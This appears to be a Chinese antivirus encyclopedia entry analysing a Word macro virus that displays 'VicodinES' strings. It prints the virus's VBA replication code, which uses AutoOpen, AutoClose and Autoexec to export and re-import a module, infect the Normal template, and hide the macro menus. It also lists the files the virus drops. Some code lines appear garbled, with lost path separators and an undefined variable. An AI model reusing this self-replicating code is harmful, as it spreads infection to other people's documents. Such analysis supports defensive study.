病毒别名:
处理时间:
威胁级别:★
中文名称:
病毒类型:宏病毒
影响系统:
病毒行为:
a.病毒复制的方式:
通过模块传染:
Sub AutoOpen()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item(2).Name = Application.UserInitials Then
If Dir("c:" + Application.UserInitials) <> Application.UserInitials Then
ActiveDocument.VBProject.VBComponents.Item(x).Export ""c:"" + Application.UserInitials
End If
Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=Application.UserInitials, Object:=wdOrganizerObjectProjectItems
End If
Out:
End Sub
Sub AutoClose()
On Error Resume Next
ActiveDocument.VBProject.VBComponents.Import (""c:"" + Application.UserInitials)
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ToolsMacro()
End Sub
Sub ViewVBCode()
End Sub
Sub Autoexec()
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Open "c:v1.bas" For Output As 1
Print #1, "Attribute VB_Name = "v1"
Print #1, "Sub AutoOpen()"
Print #1, "ActiveDocument.VBProject.VBComponents.Import ("c:" + Application.UserInitials)
Print #1, "End Sub"
Close 1
NormalTemplate.VBProject.VBComponents.Import ("c:v1.bas")
End If
End Sub
b.病毒感染:
感染前先进行感染判断:
如果只读的 Normal 模板的代码模块不为空,感染。 c.病毒生成磁盘文件:
c.1 生成一个 c:True/false.bat (True/false 由Word 处于的特殊模式决定);
c.2 以用户名在 C:生成文件,如 C:Sunboy;
c.3 生成模板文件 D:Microsoft OfficeOfficeStartupNormalTemplate。
d.病毒对操作系统或者文件系统进行操作/破坏:
无。 e.病毒会对 Word、Excel 系统进行操作:
对 Word 系统进行操作:
修改 Word 标题:
" VicodinES /TNN /CB "
"Lovei sunboy"
在状态条上输出信息:
状态条显示15个"VicodinES "
状态条显示12个"VicodinES "
状态条显示10个" VicodinES "
状态条显示 yy = "VicodinES ---> VicodinES VicodinES ........"
状态条显示">:-) VicodinES .............." 选定已区域上输出信息:
“Lovei”